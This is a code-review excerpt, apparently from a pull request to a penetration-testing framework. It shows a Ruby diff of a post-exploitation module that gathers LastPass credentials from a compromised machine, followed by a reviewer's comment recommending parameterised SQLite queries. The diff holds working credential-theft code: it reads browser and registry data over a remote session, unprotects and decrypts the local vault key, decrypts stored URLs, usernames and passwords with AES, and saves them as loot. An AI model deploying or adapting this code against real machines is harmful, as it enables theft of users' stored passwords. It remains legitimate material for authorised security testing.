modules/post/multi/gather/lastpass_creds.rb

```diff
@@ -242,72 +210,611 @@ def file_paths(path, browser, account)
+      decrypted_data = "" if decrypted_data.nil?
+      vault_data << decrypted_data if (label == "url" || label == "username" || label == "password")
+      pointer = pointer + 4 + length
+    end
+    return vault_data[0] == "http://sn" ? nil : vault_data # TODO: Support secure notes
+  end
+
+  def decrypt_vault_password(key, encrypted_data)
+    return nil if key.blank? || encrypted_data.blank?
+
+    if encrypted_data[0] == "!" # Apply CBC
+      decipher = OpenSSL::Cipher.new("AES-256-CBC")
+      decipher.iv = encrypted_data[1, 16] # Discard !
+      encrypted_data = encrypted_data[17..-1]
+    else # Apply ECB
+      decipher = OpenSSL::Cipher.new("AES-256-ECB")
+    end
+    decipher.decrypt
+    decipher.key = [key].pack "H*"
+
+    begin
+      return decipher.update(encrypted_data) + decipher.final
+    rescue
+      vprint_error "Vault password could not be decrypted"
+      return nil
+    end
+  end
+
+  # Reads a remote file and loots it
+  def loot_file(path, data, title, type, description)
+    data = read_remote_file(path) if data.nil? # If no data is passed, read remote file
+    return nil if data.nil?
+
+    loot_path = store_loot(
+      title,
+      type,
+      session,
+      data,
+      nil,
+      description
+    )
+    loot_path
+  end
+
+  # Reads a remote file and returns the data
+  def read_remote_file(path)
+    data = nil
+
     begin
-      decipher.update(Base64.decode64(encrypted_password)) + decipher.final
+      data = read_file(path)
+    rescue EOFError
+      vprint_error "Error reading file #{path} It could be empty"
+    end
+    data
+  end
+
+  def read_registry_key_value(key, value)
+    begin
+      root_key, base_key = session.sys.registry.splitkey(key)
+      reg_key = session.sys.registry.open_key(root_key, base_key, KEY_READ)
+      return nil unless reg_key
+      reg_value = reg_key.query_value(value)
+      return nil unless reg_value
     rescue
-      print_error "Password for #{email} could not be decrypted"
+      vprint_error "Error reading registry key #{key} and value #{value}"
+    end
+    reg_key.close if reg_key
+    return reg_value.blank? ? nil : reg_value.data
+  end
+
+  def extract_local_encrypted_vault_key(browser, username, lp_data)
+    if browser.match(/Firefox|IE/)
+      encrypted_key_path = lp_data['localstorage_db'] + system_separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lpall.slps"
+      encrypted_vault_key = read_remote_file(encrypted_key_path)
+      encrypted_vault_key = windows_unprotect(encrypted_vault_key) if encrypted_vault_key != nil && encrypted_vault_key.match(/^AQAAA.+/) # Verify Windows protection
+    else
+      db = SQLite3::Database.new(lp_data['lp_db_loot'])
+      result = db.execute(
+        "SELECT data FROM LastPassData " \
+        "WHERE username_hash = '" + OpenSSL::Digest::SHA256.hexdigest(username) + "' AND type = 'key'"
```

Comment:
I know this concatenation is limited to hex and is safe, but moving away from string concatenation for building queries is a good pattern to set. You can use the `?` identifier (no quotes needed), and pass the digest string as a second parameter to `execute` to have SQLite handle the escaping and interpolation for you.